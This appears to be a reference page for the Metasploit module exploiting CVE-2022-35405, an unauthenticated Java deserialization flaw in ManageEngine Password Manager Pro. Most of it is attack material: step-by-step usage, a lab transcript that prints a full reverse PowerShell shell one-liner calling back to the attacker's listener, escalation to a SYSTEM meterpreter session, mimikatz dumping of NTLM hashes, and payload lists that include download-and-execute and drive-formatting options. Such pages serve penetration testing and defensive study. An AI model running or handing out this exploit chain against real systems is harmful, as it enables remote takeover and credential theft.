Zoho Password Manager Pro XML-RPC Java Deserialization - Metasploit


This page contains detailed information about how to use the exploit/windows/http/zoho_password_manager_pro_xml_rpc_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Zoho Password Manager Pro XML-RPC Java Deserialization
Module: exploit/windows/http/zoho_password_manager_pro_xml_rpc_rce
Source code: modules/exploits/windows/http/zoho_password_manager_pro_xml_rpc_rce.rb
Disclosure date: 2022-06-24
Last modification time: 2022-08-02 14:27:27 +0000
Supported architecture(s): cmd, x64
Supported platform(s): Windows
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 7272, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2022-35405

This module exploits a Java deserialization vulnerability in Zoho ManageEngine Pro before 12101 and PAM360 before 5510. Unauthenticated attackers can send a crafted XML-RPC request containing malicious serialized data to /xmlrpc to gain RCE as the SYSTEM user.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
  • artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.

Basic Usage


msf > use exploit/windows/http/zoho_password_manager_pro_xml_rpc_rce
msf exploit(zoho_password_manager_pro_xml_rpc_rce) > exploit

Required Options


  • RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

Knowledge Base


Vulnerable Application


This module exploits a unauthenticated deserialization vulnerability in the XML RPC interface exposed by Zoho ManageEngine Password Manager Pro before 12101 and PAM360 before 5510. Note that ManageEngine Access Manager Plus before 4303 is also affected provided one provides credentials, however this is not targeted by this exploit.

Successful exploitation results in unauthenticated RCE as the NT AUTHORITY\SYSTEM user.

Installation

Vulnerable software for testing can be downloaded here. The patch can be downloaded from here

When installing the software follow the defaults. You can skip the registration however or any parts where you need to fill in additional details to continue (these should have a Skip button so you can skip them).

Verification Steps


  1. Follow the installation instructions above.
  2. Start msfconsole
  3. Do: use exploit/windows/http/zoho_password_manager_pro_xml_rpc_rce
  4. Do: set RHOSTS [IP]
  5. Do: set payload [payload]
  6. Do: set LHOST [IP]
  7. Optional: set LPORT [local port to listen on]
  8. Do: exploit

Targets


Id  Name
--  ----
0   Windows EXE Dropper
1   Windows Command
2   Windows Powershell

Scenarios


ManageEngine Password Manager Pro 12100 Running on Windows 11

msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/zoho_password_manager_pro_xml_rpc_rce
[*] Using configured payload cmd/windows/reverse_powershell
msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > set RHOSTS 172.17.245.94
RHOSTS => 172.17.245.94
msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > set LHOST 172.17.255.112 
LHOST => 172.17.255.112
msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > set LPORT 8899
LPORT => 8899
msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > show options

Module options (exploit/windows/http/zoho_password_manager_pro_xml_rpc_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.17.245.94    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metas
                                         ploit
   RPORT      7272             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local
                                         machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (cmd/windows/reverse_powershell):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.17.255.112   yes       The listen address (an interface may be specified)
   LPORT  8899             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows Command


msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > exploit

[*] Started reverse TCP handler on 172.17.255.112:8899 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Target can deserialize arbitrary data.
[*] Executing Windows Command for cmd/windows/reverse_powershell
[+] Successfully executed command: powershell -w hidden -nop -c $a='172.17.255.112';$b=8899;$c=New-Object system.net.sockets.tcpclient;$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$ob=New-Object System.Byte[] 65536;$eb=New-Object System.Byte[] 65536;$e=new-object System.Text.UTF8Encoding;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.RedirectStandardError=1;$p.StartInfo.UseShellExecute=0;$q=$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;$es=$p.StandardError;$osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);$esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);$c.connect($a,$b);$s=$c.GetStream();while ($true) {    start-sleep -m 100;    if ($osread.IsCompleted -and $osread.Result -ne 0) {      $r=$os.BaseStream.EndRead($osread);      $s.Write($ob,0,$r);      $s.Flush();      $osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);    }    if ($esread.IsCompleted -and $esread.Result -ne 0) {      $r=$es.BaseStream.EndRead($esread);      $s.Write($eb,0,$r);      $s.Flush();      $esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);    }    if ($s.DataAvailable) {      $r=$s.Read($nb,0,$nb.Length);      if ($r -lt 1) {          break;      } else {          $str=$e.GetString($nb,0,$r);          $is.write($str);      }    }    if ($c.Connected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectRead) -and $c.Client.Available -eq 0)) {        break;    }    if ($p.ExitCode -ne $null) {        break;    }}
[*] Command shell session 1 opened (172.17.255.112:8899 -> 172.17.245.94:56612) at 2022-08-02 11:37:28 -0500


Shell Banner:
Microsoft Windows [Version 10.0.22000.795]
(c) Microsoft Corporation. All rights reserved.

C:\Program Files\ManageEngine\PMP\bin>
-----


C:\Program Files\ManageEngine\PMP\bin>whoami
whoami
nt authority\system

C:\Program Files\ManageEngine\PMP\bin>background

Background session 1? [y/N]  y   
msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > sessions

Active sessions
===============

  Id  Name  Type               Information                                      Connection
  --  ----  ----               -----------                                      ----------
  1         shell cmd/windows  Shell Banner: Microsoft Windows [Version 10.0.2  172.17.255.112:8899 -> 172.17.245.94:56612 (172.
                               2000.795] (c) Microsoft Corpo...                 17.245.94)

msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.17.255.112:4433 
msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > 
[*] Sending stage (200774 bytes) to 172.17.245.94
[*] Meterpreter session 2 opened (172.17.255.112:4433 -> 172.17.245.94:56631) at 2022-08-02 11:38:11 -0500
[*] Stopping exploit/multi/handler

msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                   Connection
  --  ----  ----                     -----------                                   ----------
  1         shell cmd/windows        Shell Banner: Microsoft Windows [Version 10.  172.17.255.112:8899 -> 172.17.245.94:56612 (1
                                     0.22000.795] (c) Microsoft Corpo...           72.17.245.94)
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ WIN11-TEST              172.17.255.112:4433 -> 172.17.245.94:56631 (1
                                                                                   72.17.245.94)

msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( [email protected] )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain      NTLM                              SHA1
--------  ------      ----                              ----
admin     WIN11-TEST  209c6174da490caeb422f3fa5a7ae634  7c87541fd3f3ef5016e12d411900c87a6046a8e8

wdigest credentials
===================

Username     Domain      Password
--------     ------      --------
(null)       (null)      (null)
WIN11-TEST$  WORKGROUP   (null)
admin        WIN11-TEST  (null)

kerberos credentials
====================

Username     Domain      Password
--------     ------      --------
(null)       (null)      (null)
admin        WIN11-TEST  (null)
win11-test$  WORKGROUP   (null)


meterpreter > 

Go back to menu.

Msfconsole Usage


Here is how the windows/http/zoho_password_manager_pro_xml_rpc_rce exploit module looks in the msfconsole:

msf6 > use exploit/windows/http/zoho_password_manager_pro_xml_rpc_rce

[*] Using configured payload cmd/windows/reverse_powershell
msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > show info

       Name: Zoho Password Manager Pro XML-RPC Java Deserialization
     Module: exploit/windows/http/zoho_password_manager_pro_xml_rpc_rce
   Platform: Windows
       Arch: cmd, x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2022-06-24

Provided by:
  Vinicius
  Y4er
  Grant Willcox

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Windows EXE Dropper
  1   Windows Command
  2   Windows Powershell

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT      7272             yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0
                                         to listen on all addresses.
  SRVPORT    8080             yes       The local port to listen on.
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Base path
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits a Java deserialization vulnerability in Zoho 
  ManageEngine Pro before 12101 and PAM360 before 5510. 
  Unauthenticated attackers can send a crafted XML-RPC request 
  containing malicious serialized data to /xmlrpc to gain RCE as the 
  SYSTEM user.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2022-35405
  https://xz.aliyun.com/t/11578
  https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html
  https://archives2.manageengine.com/passwordmanagerpro/12101/ManageEngine_PasswordManager_Pro_12100_to_12101.ppm

Module Options


This is a complete list of options available in the windows/http/zoho_password_manager_pro_xml_rpc_rce exploit:

msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > show options

Module options (exploit/windows/http/zoho_password_manager_pro_xml_rpc_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      7272             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.
                                         0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host

Payload options (cmd/windows/reverse_powershell):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   Windows Command

Advanced Options


Here is a complete list of advanced options supported by the windows/http/zoho_password_manager_pro_xml_rpc_rce exploit:

msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > show advanced

Module advanced options (exploit/windows/http/zoho_password_manager_pro_xml_rpc_rce):

   Name                                Current Setting                     Required  Description
   ----                                ---------------                     --------  -----------
   AutoCheck                           true                                no        Run check before exploit
   CMDSTAGER::DECODER                                                      no        The decoder stub to use.
   CMDSTAGER::FLAVOR                   auto                                no        The CMD Stager to use. (Accepted: auto, bourne, debug_asm, d
                                                                                     ebug_write, echo, printf, vbs, vbs_adodb, certutil, tftp, wg
                                                                                     et, curl, fetch, lwprequest, psh_invokewebrequest, ftp_http)
   CMDSTAGER::SSL                      false                               no        Use SSL/TLS for supported stagers
   CMDSTAGER::TEMP                                                         no        Writable directory for staged files
   CMDSTAGER::URIPATH                                                      no        Payload URI path for supported stagers
   ContextInformationFile                                                  no        The information file that contains context information
   DOMAIN                              WORKSTATION                         yes       The domain to use for Windows authentication
   DigestAuthIIS                       true                                no        Conform to IIS, should work for most servers. Only set to fa
                                                                                     lse for non-IIS servers
   DisablePayloadHandler               false                               no        Disable the handler code for the selected payload
   EXE::Custom                                                             no        Use custom exe instead of automatically generating a payload
                                                                                      exe
   EXE::EICAR                          false                               no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack                       false                               no        Use the default template in case the specified one is missin
                                                                                     g
   EXE::Inject                         false                               no        Set to preserve the original EXE function
   EXE::OldMethod                      false                               no        Set to use the substitution EXE generation method.
   EXE::Path                                                               no        The directory in which to look for the executable template
   EXE::Template                                                           no        The executable template file name.
   EnableContextEncoding               false                               no        Use transient context when encoding payloads
   FingerprintCheck                    true                                no        Conduct a pre-exploit fingerprint verification
   ForceExploit                        false                               no        Override check result
   HttpClientTimeout                                                       no        HTTP connection and receive timeout
   HttpPassword                                                            no        The HTTP password to specify for authentication
   HttpRawHeaders                                                          no        Path to ERB-templatized raw headers to append to existing he
                                                                                     aders
   HttpTrace                           false                               no        Show the raw HTTP requests and responses
   HttpTraceColors                     red/blu                             no        HTTP request and response colors for HttpTrace (unset to dis
                                                                                     able)
   HttpTraceHeadersOnly                false                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                            no        The HTTP username to specify for authentication
   ListenerBindAddress                                                     no        The specific IP address to bind to if different from SRVHOST
   ListenerBindPort                                                        no        The port to bind to if different from SRVPORT
   ListenerComm                                                            no        The specific communication channel to use for this service
   MSI::Custom                                                             no        Use custom msi instead of automatically generating a payload
                                                                                      msi
   MSI::EICAR                          false                               no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                               no        The directory in which to look for the msi template
   MSI::Template                                                           no        The msi template file name
   MSI::UAC                            false                               no        Create an MSI with a UAC prompt (elevation to SYSTEM if acce
                                                                                     pted)
   Powershell::encode_final_payload    false                               yes       Encode final payload for -EncodedCommand
   Powershell::encode_inner_payload    false                               yes       Encode inner payload for -EncodedCommand
   Powershell::exec_in_place           false                               yes       Produce PSH without executable wrapper
   Powershell::exec_rc4                false                               yes       Encrypt PSH with RC4
   Powershell::method                  reflection                          yes       Payload delivery method (Accepted: net, reflection, old, msi
                                                                                     l)
   Powershell::no_equals               false                               yes       Pad base64 until no "=" remains
   Powershell::noninteractive          true                                yes       Execute powershell without interaction
   Powershell::persist                 false                               yes       Run the payload in a loop
   Powershell::prepend_protections_by  auto                                yes       Prepend AMSI/SBL bypass (Accepted: auto, true, false)
   pass
   Powershell::prepend_sleep                                               no        Prepend seconds of sleep
   Powershell::remove_comspec          false                               yes       Produce script calling powershell directly
   Powershell::strip_comments          true                                yes       Strip comments
   Powershell::strip_whitespace        false                               yes       Strip whitespace
   Powershell::sub_funcs               false                               yes       Substitute function names
   Powershell::sub_vars                true                                yes       Substitute variable names
   Powershell::wrap_double_quotes      true                                yes       Wraps the -Command argument in single quotes
   SSLCipher                                                               no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression                      false                               no        Enable SSL/TLS-level compression
   SSLServerNameIndication                                                 no        SSL/TLS Server Name Indication (SNI)
   SSLVersion                          Auto                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL
                                                                                     23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TL
                                                                                     S1, TLS1.1, TLS1.2)
   SendRobots                          false                               no        Return a robots.txt file if asked for one
   URIHOST                                                                 no        Host to use in URI (useful for tunnels)
   URIPORT                                                                 no        Port to use in URI (useful for tunnels)
   UserAgent                           Mozilla/5.0 (Macintosh; Intel Mac   no        The User-Agent header to use for all requests
                                       OS X 12.2; rv:97.0) Gecko/20100101
                                        Firefox/97.0
   VERBOSE                             false                               no        Enable detailed status messages
   WORKSPACE                                                               no        Specify the workspace for this module
   WfsDelay                            2                                   no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/windows/reverse_powershell):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy b
                                                          ut directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the windows/http/zoho_password_manager_pro_xml_rpc_rce module can exploit:

msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows EXE Dropper
   1   Windows Command
   2   Windows Powershell

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the windows/http/zoho_password_manager_pro_xml_rpc_rce exploit:

msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > show payloads

Compatible Payloads
===================

   #    Name                                                                       Disclosure Date  Rank    Check  Description
   -    ----                                                                       ---------------  ----    -----  -----------
   0    payload/cmd/windows/adduser                                                                 normal  No     Windows Execute net user /ADD CMD
   1    payload/cmd/windows/bind_lua                                                                normal  No     Windows Command Shell, Bind TCP (via Lua)
   2    payload/cmd/windows/bind_perl                                                               normal  No     Windows Command Shell, Bind TCP (via Perl)
   3    payload/cmd/windows/bind_perl_ipv6                                                          normal  No     Windows Command Shell, Bind TCP (via perl) IPv6
   4    payload/cmd/windows/bind_ruby                                                               normal  No     Windows Command Shell, Bind TCP (via Ruby)
   5    payload/cmd/windows/download_eval_vbs                                                       normal  No     Windows Executable Download and Evaluate VBS
   6    payload/cmd/windows/download_exec_vbs                                                       normal  No     Windows Executable Download and Execute (via .vbs)
   7    payload/cmd/windows/generic                                                                 normal  No     Windows Command, Generic Command Execution
   8    payload/cmd/windows/jjs_reverse_tcp                                                         normal  No     Windows Shell, Reverse TCP (via jjs)
   9    payload/cmd/windows/powershell/adduser                                                      normal  No     Powershell Exec
   10   payload/cmd/windows/powershell/custom/bind_hidden_ipknock_tcp                               normal  No     Powershell Exec, Windows shellcode stage, Hidden Bind Ipknock TCP Stager
   11   payload/cmd/windows/powershell/custom/bind_hidden_tcp                                       normal  No     Powershell Exec, Windows shellcode stage, Hidden Bind TCP Stager
   12   payload/cmd/windows/powershell/custom/bind_ipv6_tcp                                         normal  No     Powershell Exec, Windows shellcode stage, Bind IPv6 TCP Stager (Windows x86)
   13   payload/cmd/windows/powershell/custom/bind_ipv6_tcp_uuid                                    normal  No     Powershell Exec, Windows shellcode stage, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   14   payload/cmd/windows/powershell/custom/bind_named_pipe                                       normal  No     Powershell Exec, Windows shellcode stage, Windows x86 Bind Named Pipe Stager
   15   payload/cmd/windows/powershell/custom/bind_nonx_tcp                                         normal  No     Powershell Exec, Windows shellcode stage, Bind TCP Stager (No NX or Win7)
   16   payload/cmd/windows/powershell/custom/bind_tcp                                              normal  No     Powershell Exec, Windows shellcode stage, Bind TCP Stager (Windows x86)
   17   payload/cmd/windows/powershell/custom/bind_tcp_rc4                                          normal  No     Powershell Exec, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   18   payload/cmd/windows/powershell/custom/bind_tcp_uuid                                         normal  No     Powershell Exec, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x86)
   19   payload/cmd/windows/powershell/custom/reverse_hop_http                                      normal  No     Powershell Exec, Windows shellcode stage, Reverse Hop HTTP/HTTPS Stager
   20   payload/cmd/windows/powershell/custom/reverse_http                                          normal  No     Powershell Exec, Windows shellcode stage, Windows Reverse HTTP Stager (wininet)
   21   payload/cmd/windows/powershell/custom/reverse_http_proxy_pstore                             normal  No     Powershell Exec, Windows shellcode stage, Reverse HTTP Stager Proxy
   22   payload/cmd/windows/powershell/custom/reverse_https                                         normal  No     Powershell Exec, Windows shellcode stage, Windows Reverse HTTPS Stager (wininet)
   23   payload/cmd/windows/powershell/custom/reverse_https_proxy                                   normal  No     Powershell Exec, Windows shellcode stage, Reverse HTTPS Stager with Support for Custom Proxy
   24   payload/cmd/windows/powershell/custom/reverse_ipv6_tcp                                      normal  No     Powershell Exec, Windows shellcode stage, Reverse TCP Stager (IPv6)
   25   payload/cmd/windows/powershell/custom/reverse_named_pipe                                    normal  No     Powershell Exec, Windows shellcode stage, Windows x86 Reverse Named Pipe (SMB) Stager
   26   payload/cmd/windows/powershell/custom/reverse_nonx_tcp                                      normal  No     Powershell Exec, Windows shellcode stage, Reverse TCP Stager (No NX or Win7)
   27   payload/cmd/windows/powershell/custom/reverse_ord_tcp                                       normal  No     Powershell Exec, Windows shellcode stage, Reverse Ordinal TCP Stager (No NX or Win7)
   28   payload/cmd/windows/powershell/custom/reverse_tcp                                           normal  No     Powershell Exec, Windows shellcode stage, Reverse TCP Stager
   29   payload/cmd/windows/powershell/custom/reverse_tcp_allports                                  normal  No     Powershell Exec, Windows shellcode stage, Reverse All-Port TCP Stager
   30   payload/cmd/windows/powershell/custom/reverse_tcp_dns                                       normal  No     Powershell Exec, Windows shellcode stage, Reverse TCP Stager (DNS)
   31   payload/cmd/windows/powershell/custom/reverse_tcp_rc4                                       normal  No     Powershell Exec, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   32   payload/cmd/windows/powershell/custom/reverse_tcp_rc4_dns                                   normal  No     Powershell Exec, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   33   payload/cmd/windows/powershell/custom/reverse_tcp_uuid                                      normal  No     Powershell Exec, Windows shellcode stage, Reverse TCP Stager with UUID Support
   34   payload/cmd/windows/powershell/custom/reverse_udp                                           normal  No     Powershell Exec, Windows shellcode stage, Reverse UDP Stager with UUID Support
   35   payload/cmd/windows/powershell/custom/reverse_winhttp                                       normal  No     Powershell Exec, Windows shellcode stage, Windows Reverse HTTP Stager (winhttp)
   36   payload/cmd/windows/powershell/custom/reverse_winhttps                                      normal  No     Powershell Exec, Windows shellcode stage, Windows Reverse HTTPS Stager (winhttp)
   37   payload/cmd/windows/powershell/dllinject/bind_hidden_ipknock_tcp                            normal  No     Powershell Exec, Hidden Bind Ipknock TCP Stager
   38   payload/cmd/windows/powershell/dllinject/bind_hidden_tcp                                    normal  No     Powershell Exec, Hidden Bind TCP Stager
   39   payload/cmd/windows/powershell/dllinject/bind_ipv6_tcp                                      normal  No     Powershell Exec, Bind IPv6 TCP Stager (Windows x86)
   40   payload/cmd/windows/powershell/dllinject/bind_ipv6_tcp_uuid                                 normal  No     Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   41   payload/cmd/windows/powershell/dllinject/bind_named_pipe                                    normal  No     Powershell Exec, Windows x86 Bind Named Pipe Stager
   42   payload/cmd/windows/powershell/dllinject/bind_nonx_tcp                                      normal  No     Powershell Exec, Bind TCP Stager (No NX or Win7)
   43   payload/cmd/windows/powershell/dllinject/bind_tcp                                           normal  No     Powershell Exec, Bind TCP Stager (Windows x86)
   44   payload/cmd/windows/powershell/dllinject/bind_tcp_rc4                                       normal  No     Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   45   payload/cmd/windows/powershell/dllinject/bind_tcp_uuid                                      normal  No     Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)
   46   payload/cmd/windows/powershell/dllinject/reverse_hop_http                                   normal  No     Powershell Exec, Reverse Hop HTTP/HTTPS Stager
   47   payload/cmd/windows/powershell/dllinject/reverse_http                                       normal  No     Powershell Exec, Windows Reverse HTTP Stager (wininet)
   48   payload/cmd/windows/powershell/dllinject/reverse_http_proxy_pstore                          normal  No     Powershell Exec, Reverse HTTP Stager Proxy
   49   payload/cmd/windows/powershell/dllinject/reverse_ipv6_tcp                                   normal  No     Powershell Exec, Reverse TCP Stager (IPv6)
   50   payload/cmd/windows/powershell/dllinject/reverse_nonx_tcp                                   normal  No     Powershell Exec, Reverse TCP Stager (No NX or Win7)
   51   payload/cmd/windows/powershell/dllinject/reverse_ord_tcp                                    normal  No     Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)
   52   payload/cmd/windows/powershell/dllinject/reverse_tcp                                        normal  No     Powershell Exec, Reverse TCP Stager
   53   payload/cmd/windows/powershell/dllinject/reverse_tcp_allports                               normal  No     Powershell Exec, Reverse All-Port TCP Stager
   54   payload/cmd/windows/powershell/dllinject/reverse_tcp_dns                                    normal  No     Powershell Exec, Reverse TCP Stager (DNS)
   55   payload/cmd/windows/powershell/dllinject/reverse_tcp_rc4                                    normal  No     Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   56   payload/cmd/windows/powershell/dllinject/reverse_tcp_rc4_dns                                normal  No     Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   57   payload/cmd/windows/powershell/dllinject/reverse_tcp_uuid                                   normal  No     Powershell Exec, Reverse TCP Stager with UUID Support
   58   payload/cmd/windows/powershell/dllinject/reverse_winhttp                                    normal  No     Powershell Exec, Windows Reverse HTTP Stager (winhttp)
   59   payload/cmd/windows/powershell/dns_txt_query_exec                                           normal  No     Powershell Exec, DNS TXT Record Payload Download and Execution
   60   payload/cmd/windows/powershell/download_exec                                                normal  No     Powershell Exec, Windows Executable Download (http,https,ftp) and Execute
   61   payload/cmd/windows/powershell/exec                                                         normal  No     Powershell Exec
   62   payload/cmd/windows/powershell/format_all_drives                                            manual  No     Powershell Exec
   63   payload/cmd/windows/powershell/generic/debug_trap                                           normal  No     Powershell Exec, Generic x86 Debug Trap
   64   payload/cmd/windows/powershell/generic/tight_loop                                           normal  No     Powershell Exec, Generic x86 Tight Loop
   65   payload/cmd/windows/powershell/loadlibrary                                                  normal  No     Powershell Exec
   66   payload/cmd/windows/powershell/messagebox                                                   normal  No     Powershell Exec, Windows MessageBox
   67   payload/cmd/windows/powershell/meterpreter/bind_hidden_ipknock_tcp                          normal  No     Powershell Exec, Hidden Bind Ipknock TCP Stager
   68   payload/cmd/windows/powershell/meterpreter/bind_hidden_tcp                                  normal  No     Powershell Exec, Hidden Bind TCP Stager
   69   payload/cmd/windows/powershell/meterpreter/bind_ipv6_tcp                                    normal  No     Powershell Exec, Bind IPv6 TCP Stager (Windows x86)
   70   payload/cmd/windows/powershell/meterpreter/bind_ipv6_tcp_uuid                               normal  No     Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   71   payload/cmd/windows/powershell/meterpreter/bind_named_pipe                                  normal  No     Powershell Exec, Windows x86 Bind Named Pipe Stager
   72   payload/cmd/windows/powershell/meterpreter/bind_nonx_tcp                                    normal  No     Powershell Exec, Bind TCP Stager (No NX or Win7)
   73   payload/cmd/windows/powershell/meterpreter/bind_tcp                                         normal  No     Powershell Exec, Bind TCP Stager (Windows x86)
   74   payload/cmd/windows/powershell/meterpreter/bind_tcp_rc4                                     normal  No     Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   75   payload/cmd/windows/powershell/meterpreter/bind_tcp_uuid                                    normal  No     Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)
   76   payload/cmd/windows/powershell/meterpreter/reverse_hop_http                                 normal  No     Powershell Exec, Reverse Hop HTTP/HTTPS Stager
   77   payload/cmd/windows/powershell/meterpreter/reverse_http                                     normal  No     Powershell Exec, Windows Reverse HTTP Stager (wininet)
   78   payload/cmd/windows/powershell/meterpreter/reverse_http_proxy_pstore                        normal  No     Powershell Exec, Reverse HTTP Stager Proxy
   79   payload/cmd/windows/powershell/meterpreter/reverse_https                                    normal  No     Powershell Exec, Windows Reverse HTTPS Stager (wininet)
